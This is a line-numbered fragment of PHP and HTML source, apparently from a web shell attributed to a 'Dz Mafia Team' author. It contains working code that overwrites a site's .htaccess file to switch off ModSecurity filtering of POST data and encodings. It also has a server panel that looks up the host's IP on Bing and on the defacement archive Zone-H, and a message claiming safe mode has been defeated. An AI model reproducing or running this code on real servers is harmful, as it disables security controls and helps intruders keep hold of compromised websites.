776. echo "<b>[SafeMode Done] .. :) This Script Is Coded By Akram Stelle (Dz Mafia Team)</b>";
777. echo ("<br>");
778.  
779. $fp2 = fopen(".htaccess","w+");
780. fwrite($fp2,"
781. <IfModule mod_security.c>
782. KillFilterEngine Off
783. KillFilterScanPOST Off
784. KillFilterCheckURLEncoding Off
785. KillFilterCheckUnicodeEncoding Off
786. </IfModule>
787. ");
788.  
789.  
790. echo "<b>[Mod_Security Done]</b><br>";
791.  
792. echo "<font><center></td></tr><table> ";
793.  
794. }
795. ?>
796.  
797. </strong>
798. </tr>
799. </td>
800. <tr>
801.  
802. <tr>
803. <td valign="top" bgcolor="#151515" style="width: 139px"><strong>SerVer Search</strong></td>
804. <td valign="top" bgcolor="#151515" colspan="5">
805. <strong>
806. <?php
807.  
808.  
809. echo " <center> </center>";
810. $serverIP = gethostbyname($_SERVER["HTTP_HOST"]);
811. echo "Server IP = <font color=red>".gethostbyname($_SERVER["HTTP_HOST"])."
812. </font>[</span>
813. <a href='http://bing.com/search?q=ip:".$serverIP."&go=&form=QBLH&filt=all' target=\"_blank\">Bing Search</a>][</span><a href='http://zone-h.com/archive/ip=".$serverIP."' target=\"_blank\">Zone-H Search</a>]<center>";
814. ?>
815. </strong>
816. </tr>
817. </td>
818. <tr>
819. <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong> KrimOu Expect Us</strong></td>
820. </tr>